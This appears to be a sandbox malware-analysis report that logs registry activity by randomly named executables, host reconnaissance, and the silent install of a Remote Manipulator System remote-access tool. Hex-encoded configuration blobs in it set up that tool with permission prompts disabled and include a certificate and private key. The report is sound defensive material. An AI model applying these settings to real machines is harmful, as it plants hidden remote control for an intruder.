| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\FUSClientPath = "C:\\Windows\\SysWOW64\\ruts\\rfusclient.exe" | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223730313230223e3c696e7465726e65745f69643e3832332d3230312d3938362d3533313c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e747275653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f726d735f696e7465726e65745f69645f73657474696e67733e0d0a | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223730313230223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42434536413638363145384133323441454133453342333332363045304634384431354136443844324633323636393041363643463637384533364132383633343444323745303844344145353038363730393646354642463639313232454335434130304342443143423644433941334637443841364435313831443538413c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973742f3e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e313c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a63774d544977496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a63774d544977496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\dllhost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\Certificates = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c636572746966696374655f73657474696e67732076657273696f6e3d223730313230223e3c63657274696669636174653e4c5330744c5331435255644a5469424452564a5553555a4a51304655525330744c533074436b314a5355524b616b4e44515763325a30463353554a425a306c465154553554323936515535435a32747861477470527a6c334d454a4255584e4751555243566b31526333644455566c45566c465252305633536c594b5658704661553144515564424d56564651326433576c5674566e52694d314a735355557861474a746248646b5633686f5a45633565556c47546a566a4d314a73596c524661553144515564424d565646515864335767705662565a30596a4e5362456c464d576869625778335a466434614752484f586c4a526b3431597a4e5362474a5551575647647a423554577042654531715658684f524646345456526159555a334d48704e616b4634436b31715458684f52464634545652615955314756586844656b464b516d644f566b4a425756524262465a5554564e4a64306c42575552575556464c52454a73553170584d585a6b5231566e5646644764574659516a454b596b64474d47497a535764564d3278365a456457644531545358644a51566c45566c46525245524362464e61567a46325a4564565a315258526e566857454978596b64474d47497a535764564d3278365a4564576441704e53556c4353577042546b4a6e6133466f61326c484f586377516b465252555a4251553944515645345155314a53554a445a3074445156464651585a584e554a6e4d556b344f465246614374794e30644465576b7a436a6772526e6c6b6554565255554a56623349314e57705363455a7a55476c48654845354d6d3433626b6f3263545a36596d5a7852575269615770475347314d6347597a596d5a4a62486778566d5a43646c644e5254494b54475532617a426963303174546c5a525a32524361316f3152576435545568365658524a656e70554d6c6c4e5a584a315346426959584234596e4649646b7376566b4a4255485a685a6d3177525856315a6c41724c776f7a595870574e6a644952586f764e6b31495a6a685954474a484d57744e4d6e64785553744b5232745156586f3359577055554646484e6d687353564e76576a645a4d6d4e36516a4e465a697477515452784e6b744b436a5a35627a63316547743151793959537a567961573975645568585655524f4e6d4a5362545a794f484d334e7a644c516b73726557355262316c454e537469647a557264564231616d35564d556454626c6f316155554b4d6b6c76554441796247704964557055556b396e4e6b6f7664474e485157784a593352546130777865453146654746514d6c68444f484130645770494f44553555307874626a5257536d523152584579644468716141707655556c4551564642516b31424d4564445533464855306c694d30525252554a44643156425154524a516b465251554a546545303064555251654642336355637964537435546c6f3265584a585132553157564d31436d5a745a4846564d797430636d3573626e7058526d5176566d5a6d4f446b3354464650645531515154564264564e58596b686a4f5564506555685456464e4e4c3239544d334d775247524652697449656b78784d456f4b5457706a5356644c546d6c4e6333566a4d33704e52466c3259325a714d4578755556704c556d6b77546d3559596e424c63564d35626b466a59556c784d445245636e527061305a7a4d464d324c334d78546b52595a4170336431465065537456615568574d466f764e7a644e53585a7654335a304e6b395a4e31463652546c5a554452464d6b467a5a585a4463797476545556685446686d5632553355466c464d3234785169397a63545643436b316e64557079555568454e6d4e52616b74545a44466154326c764d31706f4e6c4a47556b70355a4535434e79396e4e6a6c68616c6c6c5a485a7965567071646d4e7264315a344e47356c55546b724b304d305a48554b65574e745957565463584e6a627a4a45564570465647646953304972576e4e71553074584d47396f516a5a6a636b683351337035535764525646687a646a56535648704264456c5a5432514b4c5330744c533146546b51675130565356456c4753554e42564555744c5330744c516f3d3c2f63657274696669636174653e3c707269766174655f6b65793e4c5330744c5331435255644a54694251556b6c575156524649457446575330744c533074436b314a535556325a306c4351555242546b4a6e6133466f61326c484f586377516b465252555a4251564e44516b746e6432646e553274425a3056425157394a516b4652517a6c696130644556577036654531545344594b646e4e5a5445744d5a6e6f3057456f7a5447784351555a5461585a7562553548613164334b306c695233497a59575a3159323578636e4a4f64437476556a4631533031565a566c316243396b644468705745685756676f34527a6c5a6431525a6444647856464a3164336c5a4d565a44516a4248556d35725530524a64325a4f557a427155453551576d64344e6e5530597a6c30635735476457396c4f484935565556424b7a6c774b324672436c4d324e5467764e79396b636b3559636e4e6a564641766233646b4c33686a64484e6956314636596b4e775244527259564535564642306355354e4f554669635564566145746f626e5271576e704e53474e534c7a594b61305270636d3976626e4a4c616e5a7552314d3054446c6a636d313153326c6c4e4752615555307a63485248596e463265587032646e4e76525849335332524461476451626a5632524734324e43733254325255565170615332527562556c5557576c6e4c3152685630316c4e47784f52545a45623234724d58645a5131566f6554464c55585a5952586455526d3876576d4e4d655735704e6b316d656d3478535856685a6d685662444930436c4e7959544e355430646f5157644e516b464252554e6e5a305642576a526c597a4277544752794f486777616a68424e45744f4d4731515232395a656e6f315233466b4f5731716556517a61564a6d644731794f54634b61465236644770526356464f54575654576e524556474a31546d7868525764544e6c704661314275624752324e486868636e4178595746536432316f52306842596e4934567a6832646d4e43513170365647395851676f305469387857546c54623063315156566b4d48644d52556c7a596d686953314e46646c5934556b39475154427a576e6c4b54334932516a684f64316834533168545244524e5a32784363574e4b56464a6a54553975436e46774e455a5662554a535a4570715254465851575a6e4e477877643341784f57677852464e554e5574725130647257577856614652484b304a51624551765458523262475648596d564e536b566f55576332576b514b4e445a6a5a474a306245354d526a686f537a46316230686e616d314b5a6b785559575233547a5677616a46694e32566f4e316b786247356a5132467452554a344c3370714d307044596e565253336c485646646c62776f3261326c6a52564d7a546b493161454933656c4979536e4578626c646d4d6e4e6c636d4933526c6c5257554e50596d3944543364534e46464c516d6452524452344d31637662484a564c7a46535969383251316451436a42705a6939694d305a56526e64505a6b6471517a4a6f524870594e6b393054454e6f64486c7753474673546e4248613052764e48527261307047595670324d6c5271536c6450566a424e62473535634464685531634b4b3159764e6c4a324e6a4a554e6e42705a45743363484179626d686a5347466d55327833596c4a42646d64584e446c595257773265554e694b3267785630457755465977656d35765130737964486b336348526d5551706961566f785a6b4e4f6556703454335a734d566c4c566a5a6f616d343351556447555574435a314645517a646a4f545a54626a6378613368756457647853474e4d516e493462456c6d53484a56533256456432777a436d5a6c64324a6e4c3055774c306454576d746c546c52475333646b4e5868424d56646a5245786f5a45464861445a724d336c315a6c5630576a6734643277334d327872626d317a4d325972554645344f5739736358554b525842724b323171566e686b6154463354446c7a4e6d39785a555a4c5455706e654574705533565064456452556d52725a6c45724b304e5662586b7265577458566a526d4f45313254476c49526e6453626c6c5061676f72614851796379394d4f46685253304a6e555551775956424756484e79635573315933706a65574a5164466c7061553574567a426961326c7063584a4e4e576b305a6c427a623368615679744c4d464e7862565630436a463661584673645739364f54466b535668765458524d6345686f61554e5956574e6f6433703661474d765a7974334e55354963565a7561484a724f444d345758685554553974636b525164575a34574768556158514b6556466151556c32623070784b7a5279524770705a6a4a6f5233637a64544a745a6c684e5532394e4d6e6c4b61565972613356464e464e6d516d4a5052455135634552554e4374354b336c4c555574435a30686e6351706f5247356c564530764d445642635535354d58686e59304d314c30686e61336851556a4257536d5976593367334d3246764f484a4955564272547a4d7a56334a444f46425156334e5857544172634770556253744a436b6442516b5976535459335a6b5251534731355745564b4d454e78533068484e57744961585268626e526d51324e304d6a5236566c51315a3151764e6a5256526b6476536c524e65577058593368726230644362314d4b54456478546c5671555652764e314a4d59335a51544374424b7a5247546c526f53307836554642765645743256444533516a4e4e5a45467652304a4253544a35614645725547464a616a64685a6e684855586836564170305555566156316c6e62537379536974545369394864464a796132643153465a4a61326c6e4e4546566353733361574636636e646f624778705a6c6c68566d31346443747059554a4f55476332556d786856566330436b6831554770435a5552745445566a5745396153585a4c6132396d6158527752484a78556e5133625642764e304a4c62554e5664557051644756734d32733053554e4b596d683665564a496345356853555a706448454b566a42326545705a62454e4263574533626b78726147564c51585a4752575a31436930744c533074525535454946425353565a42564555675330565a4c5330744c53304b3c2f707269766174655f6b65793e3c2f636572746966696374655f73657474696e67733e0d0a | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\FUSClientPath = "C:\\Windows\\SysWOW64\\ruts\\rfusclient.exe" | C:\Windows\SysWOW64\regedit.exe | N/A |
